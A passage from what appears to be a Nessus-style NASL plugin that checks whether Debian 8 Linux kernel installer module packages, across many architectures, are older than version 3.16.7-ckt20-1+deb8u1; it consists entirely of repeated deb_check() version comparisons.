prefix:\"nic-pcmcia-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-pcmcia-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-pcmcia-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-r4k-ip22-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-r5k-ip32-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-shared-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-usb-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"nic-wireless-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ntfs-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pata-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-storage-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-storage-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-storage-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-storage-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"pcmcia-storage-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"ppp-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"rtc-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"rtc-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sata-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-common-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-kirkwood-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-orion5x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-core-modules-3.16.0-4-versatile-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-extra-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-arm64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-armmp-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-s390x-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"scsi-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-powerpc-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-powerpc64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"serial-modules-3.16.0-4-powerpc64le-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-4kc-malta-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-loongson-2f-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-loongson-3-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-octeon-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"sound-modules-3.16.0-4-sb1-bcm91250a-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-586-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-686-pae-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-amd64-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"speakup-modules-3.16.0-4-loongson-2e-di\", reference:\"3.16.7-ckt20-1+deb8u1\")) 